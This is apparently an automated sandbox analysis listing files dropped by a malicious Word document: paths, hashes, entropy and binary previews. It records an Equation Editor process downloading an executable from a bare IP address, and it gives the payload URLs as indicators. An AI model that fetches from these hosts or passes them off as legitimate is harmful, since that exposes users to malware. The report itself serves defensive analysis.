Entropy (8bit):	0.287206114927881
Encrypted:	false
SSDEEP:	48:I3LloRBP5DT1y2OIyh0KOiVIsaDMR4VI+7AYiryZarohBB3+KwB3+KfH:KLloLP91Zyh07iC1izyZadH
MD5:	5F275CD42CC65F4E37A3A7ADB88AC251
SHA1:	43B9A1247FD7E6FEE59C367E4FC23081532ABA59
SHA-256:	4210C10BE3F1C34DCC62419A03A8A940590E4DD89F97ABC53BEC2828F6178A21
SHA-512:	795510CEDAE24F76CF8A30EF7AC7672387BC137820BDA3338AA0B345D10038968A4698DE15C062AB25D467A3FC2639D039ACD210BA088923E218F8A7FDA107EF
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.XM.,.:D..`..r..S,...X.F...Fa.q.............................j3.!..K.....;.........<..d...G..... ...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{A7237623-5E03-4814-94FE-7F3CA262EA81}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6710967118676062
Encrypted:	false
SSDEEP:	192:j5aYoopCZ2HcP5WamCnmhPGr23UrCEaKq4BBWumJ7Q4AzUssAU7Q4AzUssAljC72:YYo15YC72RHd2
MD5:	A4CDC0B138A5E1511DF3E9429008CDD3
SHA1:	716967EEC1AFB80ED5BA503A315EEADFFE8B2FD7
SHA-256:	EC711E69BF201B377E3C19DC7B4D2FA752256137A13D2F3C194508456C16DE81
SHA-512:	48701AA941B7ACDD8B1B4A5268CCD1B39D8AF75001F546E4F85ACCC5CFE77D0A746B0112E732FDA95C1D42FE95942F47DDFD32594D32C1B32F8ACDD0EEF0D046
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z......$K....a..S,...X.F...Fa.q.............................j....,J.3.T.$..........[+..I.c@..]".\>..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9759175009021157
Encrypted:	false
SSDEEP:	3:yVlgsRlzbXl1liAlVMfRxlR5lk9kjQl8lrL5l276:yPblzbdiAlufRx1Ulw22
MD5:	754474D0362B285A257DA3CC78E1561E
SHA1:	977FF271BBD6ABEF51E15B716B5B530C469BC83F
SHA-256:	97E6055C5B47CDF9279977438E77F0D525FB534D15401D379AF02A927C84F77D
SHA-512:	2BBEBD990FF3463FA95BC7CB4C54AFF57CBD251610246C435D8685F85502D911C47FC1213C57649F1CFED3101D3ED31E878E3A587990B1DC584094B7B121AD0A
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.A.7.2.3.7.6.2.3.-.5.E.0.3.-.4.8.1.4.-.9.4.F.E.-.7.F.3.C.A.2.6.2.E.A.8.1.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2849239899240536
Encrypted:	false
SSDEEP:	96:KzAkL6fsMGQhsvOIZGex5YHCsYmxlyRyH:MS1yG2Gex2iElyR6
MD5:	88BB3CD2F205DF018A2EF2CCC7223EA2
SHA1:	9F483D3CAC60BC4DE3A88DC153921422FB2DBACB
SHA-256:	62F64D4F62C1D488854D8982CE4725C44C07C2B76841F305EDBC99431C8091D1
SHA-512:	C62AD89530B8A54CB7DF0222C2338B264CF4BBCE6FF8623BBB6D643366F6E0A9A949BC5CC07AABB3DD892131A34D56A776E8E711E0E02A9D1BF7EE96FA82A98F
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z....hE.}Ij.{..S,...X.F...Fa.q.............................nX....E..}P'.v.........?....h.@..j..-u.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{D52C8A6F-38F1-4102-9EE5-ECDCF6278B29}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22115552027946142
Encrypted:	false
SSDEEP:	96:KNCaKDSlQ8yUEi85fdiDZNE8F9n81Bn81b:2GDSlQtUEiifdiDZNEIn8Bn8
MD5:	C40CD17B07A96AC0B5AE50766E6F5F45
SHA1:	2B07017C9BB10656FA25786D65BAA486905D7490
SHA-256:	F1D886D208E7F69F7E6F3B59ABF1199AD473371616041E96E19A9EB5574895DE
SHA-512:	29B781FA6BE17BA725676E1F0FFDBF0CE57C7EF3C0232AAB34932A86F1F81DD50F7E25E7C7818AD7B9E8276E18F33D06BD1CD713254D1A1663DE6FB5869038DF
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z....d.F..~....OS,...X.F...Fa.q..............................Y]...K..k..2.............eI.[.....P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.985963527461122
Encrypted:	false
SSDEEP:	3:yVlgsRlzycy5DZUl0iIlcg87877WnE2lZ276:yPblzF0UltIlcg8w7inEg22
MD5:	CCD001632AA30047218E47ACDF456533
SHA1:	F80471D406A31FDE753434CD39B8E075BB88C915
SHA-256:	6840816CA285599813740E838C8A40B7810C798C238647162E9E0C3E83D5919C
SHA-512:	FEC981169A7F8EEBD3FD35317F027B897E2E73887BCD19AF8A3DD8C970F5BAB4CA28F7B612F178C6751D617DA5E6EFCD53404761AB72804DA18FFDE5CEB7CBF0
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.D.5.2.C.8.A.6.F.-.3.8.F.1.-.4.1.0.2.-.9.E.E.5.-.E.C.D.C.F.6.2.7.8.B.2.9.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	166200
Entropy (8bit):	7.481059066220283
Encrypted:	false
SSDEEP:	3072:cbG7N2kDTHUpou0lvStHlquLNLbzKhBvOQsn7DdTAk5RmIdaDm2ghplP:cbE/HUMFSeK+hYQsn7CXIoDyhpl
MD5:	38034F18AF511C3B04B25170735E8B8E
SHA1:	797252E9139D3D46825440335437AD9D538F6B5B
SHA-256:	7BABDD2C7D3752B7B48729110F0AB94DE7CF74C478B7E1EA7A71A468748E70C0
SHA-512:	DA2CE49E148BC8877D391316D785A067083EBDF0884B9389F2E3DB6B71F6E3269FED55D39A1A4557DB1E628316ABF50E520594D8B5A416C7535003F963D7038C
Malicious:	true
Reputation:	low
IE Cache URL:	http://107.172.93.32/309/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................f>....@..........................................................t..h............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dhl_shp[1].wbk

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	downloaded
Size (bytes):	18828
Entropy (8bit):	3.979527597870345
Encrypted:	false
SSDEEP:	384:63Vr27NFCKUDap4TQrHi965nRFaI7ny5BEtK3g:63p27NFCKUDap4TQrCKnnT7MBMK3g
MD5:	A6FFA04A3201EE67F8A8AA428B7C8E5D
SHA1:	084018D9CBD532EA01921A7AE39873DFC1F47E57
SHA-256:	3288C730D8FD5995A16BFE2A660A1E0163C8ABF57AFF25B2827AE4693F6B5799
SHA-512:	5C29CF8C0208230A1B559347C68A477CE2264F607B9B7C483A1849569A938DCC019A5A00D56D83885D21F219937D55DBB23C74235EEF7CF0C61EA439F895FE60
Malicious:	false
Reputation:	low
IE Cache URL:	http://107.172.93.32/invoice/dhl_shp.wbk
Preview:	{\rt.$5<-,(?>3529~)?=@1>!8!2!$-,>2??[[,!\|5#!.5[=:?&.?2(?1\|%;)[6#,?_(8;+-`-=,<:?;.!^>$0%?:;)$?~`;6_@%1_,`,?&[./4?'=6!`^~,?0215#[!440'(@:%.+<8406)'&9??$;,66@(#.?+^?!%?@][:`9~;.^4`26)#?15%&</%.1<?@(%?52[(-)_^6???']?!=?4?~]2'24=\|4@?(/?.67.,/2?>%'59-<<.5[:8\|6-9>@/2%#1`?2@;\|#.9%:?,>&^(=#8.]0!'_335<!-)?@%6<%$/@4>-[]/8&%\|'?2%[2&%&-@]~`[[%]![(9(<[=0^(%=_-=-?::]:;.%+1\|]?0+`_!?,.`-!8+5`?5]%#'+)?=[#,%,[_09)<1&+\|<<2@86@?/.)..~%0%\|@,1`'%1.~&%%~)#$!]/##/6,<8$`$.[:[1,/3%>2(9)4%2%?(4\|[:?\|.81%0'%[-@..8??18`?0)<72/?:^:6;43/4?+[<?,)?3$6/_6.\|%+$9@(9&?@?_!(-2,1$7:\|%[^_<?1~,7,>1?'^-?^84?>[\|?94[:%;?0??\|~30!=?,.=-%\|;21>&.$?%?,77..75^.?986.0%)/.@`/%>(:?31\|$?24.7[>77#.!._$,#[/%>#,(9<%7.>!#&!2#_`>9'.`)%[2%5-/-6/[@~?$!>6.:]'?&!.5.28@?-4$(?'<$4$8\|~%989%45<?).$..]?!]~,.:9?)?0?/,[=8&?(~``_?!=?/(%]:#'64?-%.%?<(]`@<,8\|,:=]3:#$09!`.!8\|?<!#.).!2,\|`.^<^]//~_9509:?~%17>^[7!;??2>;#4(.?.%?~.;?][^%3+1._<?~/=;;`@[3+2.^0-'32_(,`;)0`5+%~!=97`66']+,!~/%/:,+\|1~?6%.*<'/`?.<1($8)$?_84)>?+[![?9^'`;4;~:.,5??&$=%-.?(314

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DCC5A3.wbk

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	18828
Entropy (8bit):	3.979527597870345
Encrypted:	false
SSDEEP:	384:63Vr27NFCKUDap4TQrHi965nRFaI7ny5BEtK3g:63p27NFCKUDap4TQrCKnnT7MBMK3g
MD5:	A6FFA04A3201EE67F8A8AA428B7C8E5D
SHA1:	084018D9CBD532EA01921A7AE39873DFC1F47E57
SHA-256:	3288C730D8FD5995A16BFE2A660A1E0163C8ABF57AFF25B2827AE4693F6B5799
SHA-512:	5C29CF8C0208230A1B559347C68A477CE2264F607B9B7C483A1849569A938DCC019A5A00D56D83885D21F219937D55DBB23C74235EEF7CF0C61EA439F895FE60
Malicious:	false
Reputation:	low
Preview:	{\rt.$5<-,(?>3529~)?=@1>!8!2!$-,>2??[[,!\|5#!.5[=:?&.?2(?1\|%;)[6#,?_(8;+-`-=,<:?;.!^>$0%?:;)$?~`;6_@%1_,`,?&[./4?'=6!`^~,?0215#[!440'(@:%.+<8406)'&9??$;,66@(#.?+^?!%?@][:`9~;.^4`26)#?15%&</%.1<?@(%?52[(-)_^6???']?!=?4?~]2'24=\|4@?(/?.67.,/2?>%'59-<<.5[:8\|6-9>@/2%#1`?2@;\|#.9%:?,>&^(=#8.]0!'_335<!-)?@%6<%$/@4>-[]/8&%\|'?2%[2&%&-@]~`[[%]![(9(<[=0^(%=_-=-?::]:;.%+1\|]?0+`_!?,.`-!8+5`?5]%#'+)?=[#,%,[_09)<1&+\|<<2@86@?/.)..~%0%\|@,1`'%1.~&%%~)#$!]/##/6,<8$`$.[:[1,/3%>2(9)4%2%?(4\|[:?\|.81%0'%[-@..8??18`?0)<72/?:^:6;43/4?+[<?,)?3$6/_6.\|%+$9@(9&?@?_!(-2,1$7:\|%[^_<?1~,7,>1?'^-?^84?>[\|?94[:%;?0??\|~30!=?,.=-%\|;21>&.$?%?,77..75^.?986.0%)/.@`/%>(:?31\|$?24.7[>77#.!._$,#[/%>#,(9<%7.>!#&!2#_`>9'.`)%[2%5-/-6/[@~?$!>6.:]'?&!.5.28@?-4$(?'<$4$8\|~%989%45<?).$..]?!]~,.:9?)?0?/,[=8&?(~``_?!=?/(%]:#'64?-%.%?<(]`@<,8\|,:=]3:#$09!`.!8\|?<!#.).!2,\|`.^<^]//~_9509:?~%17>^[7!;??2>;#4(.?.%?~.;?][^%3+1._<?~/=;;`@[3+2.^0-'32_(,`;)0`5+%~!=97`66']+,!~/%/:,+\|1~?6%.*<'/`?.<1($8)$?_84)>?+[![?9^'`;4;~:.,5??&$=%-.?(314

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	3.921034693025293
Encrypted:	false
SSDEEP:	48:rXay52Fb1dqh1ranq8I/g2f7CFWlO9qWrEPxCE8VpBX3T14+hq980c:j/UFb14e1jc4OI9EJ85TPhM8
MD5:	6E0BAC500FB6E557667A9D3EEBCF83DB
SHA1:	25653B2CA2C0606B662BB4AEC59AD99AEEE2EDA8
SHA-256:	47038FC43776952C0F9BCFDDE5F83127BC48FCD7AB8DD9CADA365B68E35E28A3
SHA-512:	92FDBBED0756642029C2C7BA1C03ADF39377CE144B466179F1F4136A93E88226F2347B3299F6B549513357C22A78EED080075EC59CC1680F1B8276AF3EE1CFEA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AF71696C-9FFE-4094-80B8-5D87621A22A7}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.4659962479891018
Encrypted:	false
SSDEEP:	48:gaDUpStTsXTIBWpLoS6rw7WMyzy5urX94LkM/SBxVJWI8xTClg+dYQ5uA:PZtT5Wps5r/OurX9yf/SB/YTB6uA
MD5:	CA43ED52791EBF7C1EA332FD4CC46FAE
SHA1:	CCF811128B9FB83980AF98CEFF35327D18569A39
SHA-256:	74421BCF9CA31DFE67F6667470FA2E23557FD7B91E433059209CB0EB6E3F4740
SHA-512:	7BB6902C67A22EA10409E815C80A4A965DA5963189974451E328EDFAF841D6C52A2381F9CF3851A11F13E7D6A7F614BEE7BEF7D5F22F762F6EB4EFCF90954349
Malicious:	false
Reputation:	low
Preview:	..$.5.<.-.,.(.?.>.3.5.2.9.~.).?.=.@.1.>.!.8.!.2.!.$.-.,.>.2.?.?.[..[.,.!.\|.5.#.!...5.[.=.:.?.&...?.2.(.?.1.\|.%.;.).[.6.#.,.?._.(.8.;.+.-.`.-.=.,.<.:.?.;...!.^.>.$.0.%.?.:.;.).$.?.~.`.;.6._.@.%.1._.,.`.,.?.&.[.../.4.?.'.=.6.!.`.^.~.,.?.0.2.1.5.#.[.!.4.4.0.'.(.@.:.%...+.<.8.4.0.6.).'.&..9.?.?.$.;.,.6.6.@.(.#...?.+.^.?.!.%.?.@.]..[.:.`.9.~.;...^.4.`.2.6.).#.?.1.5.%.&.<./.%...1.<.?.@.(.%.?.5.2.[.(.-.)._.^.6.?.?.?.'.].?.!.=.?.4.?..~.].2.'.2.4.=.\|.4.@.?.(./.?....6.7...,./.2.?.>.%.'.5.9.-.<..<...5..[.:.8.\|.6.-.9.>.@./.2.%.#.1.`.?.2.@.;.\|.#...9.%.:.?..,.>.&.^.(.=.#.8...].0.!.'._.3.3.5.<.!.-.).?.@.%.6.<.%.$./.@.4.>.-.[.]./.8.&.%.\|.'.?.2.%.[.2.&.%.&.-.@.].~.`.[.[.%.].!.[.(.9.(.<.[.=.0.^.(.%.=._.-.=.-.?.:.:.].:.;...%.+.1.\|.].?..0.+.`._.!.?.,...`.-.!.8.+.5.`.?.5.].%.#.'.+.).?.=.[.#.,.%.,.[._.0.9.).<.1.&.+.\|.<.<.2.@.8.6.@.?./...).....~.%.0.%.\|.@.,.1.`.'.%.1...~.&.%.%..~.).#.$.!.]./.#.#./.6.,.<.8.$.`.$...[.:.[.1.,./.3.%.>.2.(.9.).4.%.2.%.?.(.4.\|.[.:.?.\|...8.1.%.0.'.%.[.-.@.....8.?.?.1.8.`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C73D7E24-0695-475A-9EE3-0951BA4BA5FE}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	dBase III DBT, version number 0, next free block index 7536653
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.10581667566270775
Encrypted:	false
SSDEEP:	3:Ghl/dlYdn:Gh2n
MD5:	28ADF62789FD86C3D04877B2D607E000
SHA1:	A62F70A7B17863E69759A6720E75FC80E12B46E6
SHA-256:	0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
SHA-512:	15C01B4AD2E173BAF8BF0FAE7455B4284267005E6E5302640AA8056075742E9B8A2004B8EB6200AA68564C40A2596C7600D426619A2AC832C64DB703A7F0360D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..s.d.f.s.f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB971226-827B-47B0-8F41-C98C9532A108}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: C9k458CPpv.exe, Detection: malicious, Browse Filename: 9u4xTDR5bG.exe, Detection: malicious, Browse Filename: b4#Uc6a9.exe, Detection: malicious, Browse Filename: 9u4xTDR5bG.exe, Detection: malicious, Browse Filename: lUkTchBi9r.rtf, Detection: malicious, Browse Filename: A3hamzfUkW.rtf, Detection: malicious, Browse Filename: 7027521.xlsx, Detection: malicious, Browse Filename: SdEkI4IDqd.exe, Detection: malicious, Browse Filename: SdEkI4IDqd.exe, Detection: malicious, Browse Filename: cP5nXH8fQI.exe, Detection: malicious, Browse Filename: cP5nXH8fQI.exe, Detection: malicious, Browse Filename: BL Copy.doc, Detection: malicious, Browse Filename: jqkuxbwi.exe, Detection: malicious, Browse Filename: HealthSystray.exe, Detection: malicious, Browse Filename: jqkuxbwi.exe, Detection: malicious, Browse Filename: listing new.xlsx, Detection: malicious, Browse Filename: Pnportd65.exe, Detection: malicious, Browse Filename: Pnportd65.exe, Detection: malicious, Browse Filename: PO-C - 20211213-PLATE.doc, Detection: malicious, Browse Filename: new.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\racehorse.dat

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	63168
Entropy (8bit):	6.498454279155086
Encrypted:	false
SSDEEP:	1536:TsB1Fc6jtZl4FMiQMaFIdINIK6SaUf6ROv:TsB1Fc6+uiXaFoINJ8mv
MD5:	D65C77AD010482FBF9F7983146D0A6B5
SHA1:	8400E92DA91E588A3CF2C9C419CB4BAB2CA60B7C
SHA-256:	F4BAA8F8FC7D5DF13DC487345B430C8733C59C0D37DD5E5462FBBD33945E724D
SHA-512:	55849D60E498EB6F39D7B629F9426B4DF7EB25A882B07C5A7E9FD288B1E7E245FB5A8839E434238EF026DFCD11C378AD8C91C12FC0659A66A5D4C2B1DFE1691E
Malicious:	false
Preview:	9......._8.f9..?.u...f9.....u...9.....u...9.9.........9........;.xf9.....e.p........r9.8....@l9.9....x<.8.8.. 3L9...W..........Z9.9.1.9...4..{<)9.f9....f9...9.u..9.Wf9.9...9.8..K...Yx=).y.0....T.\...N...Q'.G..S..0\.......v..R#.B.`..=.f....c.....73t.C-.{!u0.......;...P.....poa.9..:..q....................................................^.>..7.....A........^..2;.L....%....r(....G.M...2.(&....:$.n.W;..3...8n..w..F..B}...[GEl3..7.(tv....d[K..................................................[W............................................Z.i...............................................B...................................................................................................\.2M.....5....................................................[K.................................................................................................................................................4.......................................................[M.s8..mC....km.&.......

C:\Users\user\AppData\Local\Temp\secur32.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23040
Entropy (8bit):	5.575148216618883
Encrypted:	false
SSDEEP:	384:A9zuL7jiVVvNORNHzTdXaP4osxlUoLYuC/NWiOCW:A8zc2RJdqP4oLoQ/8
MD5:	E1FA0E4751888A35553A93778A348A24
SHA1:	98667AE0AB2D955E69C365D62F2DD1A8C839E14E
SHA-256:	A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
SHA-512:	E93E62CC3FFBC2621FD87BD6DAEDF3699799217B49A006D4A891CDBFE4DD89B33DA258C6A4D8CC28FF615CC0F033D83BF761502169D05A6FC9CBC5FF5FC2ABF1
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p...p...p...y.7.d...d...s...p...K...d...v...d...q...d...v...d.[.q...d...q...Richp...........PE..L..................!.....<.......... ........P.....Q......................................@E........................P3.......`..................................X...`...T............................................`.......1.......................text...~;.......<.................. ..`.data...8....P.......@..............@....idata..D....`.......D..............@..@.didat..0....p.......N..............@....rsrc................P..............@..@.reloc..X............V..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sxsstore.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23040
Entropy (8bit):	6.138116359523764
Encrypted:	false
SSDEEP:	384:4j1Pm6AenqNEb9jGvRtb30lEVybDPukC+Rfb6ql4PrxWpmWZr:xlMsP4l2ybJawRr
MD5:	3F305E85F2751C4AA1A4EFDF3240EDA6
SHA1:	FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9
SHA-256:	95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
SHA-512:	3BC1B150ACC164818C169448E7BCD8BEC7780278E60581E3A21722BE947BDF6016D7A99FB1F06E59057F71A3C965CD882CA974EAF288172D5285B1CEA93769C6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.I...'...'...'.......'...$...'...#...'...&.B.'...&...'..."...'...'...'.......'......'...%...'.Rich..'.................PE..L.....{............!.....B..........pH.......`.......................................P....@A........................PQ......(q..........................................T...........................h................p..$............................text....A.......B.................. ..`.data........`.......F..............@....idata.......p.......H..............@..@.rsrc................R..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{CD1AE7DA-2A17-41D2-8189-9C674B582013}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025549652263655014
Encrypted:	false
SSDEEP:	6:I3DPc1ZwbNHvxggLRZ9w1Kt0RXv//4tfnRujlw//+GtluJ/eRuj:I3DPvbZ5SvYg3J/
MD5:	F35412C1D8332575E152EE67CF9FFACF
SHA1:	B11758A7798B684ABB09E348A3E6BFF7733706B8
SHA-256:	B557EAA246C03DE4ADF22D823E3466BFC42487B433E87E34AABB83ECB0E38D6D
SHA-512:	32FEB4CC7AFC719F3F490D9D80114D21BB94035AE724470DA79DCABA5A68FDB5DFB3AFD84295A9EE6C59AA7A8598E2B1DC59D1875C819C47D94DAD68D4772E8E
Malicious:	false
Preview:	......M.eFy...z.XM.,.:D..`..r..S,...X.F...Fa.q.............................5%..3.B.............<..d...G..... .......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{E15EED8A-E489-447C-AA78-2010F2F4B9A5}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025607709213075463
Encrypted:	false
SSDEEP:	6:I3DPcvwjvxggLRlNmNp5AaIQz3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPZDmX5/tzRvYg3J/
MD5:	C8E036716001651DB89CCBCBB1647F6C
SHA1:	59551D10F7EBBFF23FEF8A0D6D6A617AA83B1C52
SHA-256:	CE318A860BFF7FE7D507D7C35C05892184CDA47CB4CA89C6C6F841AE0A9FB9F0
SHA-512:	A971F97FC5CB5589C329742BE55FEDB443EFDC89827A3D5D77F5D27A1A852771CCD071B5E59409F1F8B86C1B3A7BC216DF0ECB3C690F4897FBC9B76849CDCFA9
Malicious:	false
Preview:	......M.eFy...z....hE.}Ij.{..S,...X.F...Fa.q............................2....qCO.....gee........?....h.@..j..-u.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-AWE9934.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Jan 28 18:25:16 2022, length=10338, window=hide
Category:	modified
Size (bytes):	1019
Entropy (8bit):	4.536354456673516
Encrypted:	false
SSDEEP:	24:8Xk/XTuzLITTS+XNeiJbRDv3qGniQd7Qy:8Xk/XTk2m+XND4GiUj
MD5:	4463F2A68557C47CD4F36A76DEF1042F
SHA1:	215E4EF534F73740E487ED25741EFB17C3022830
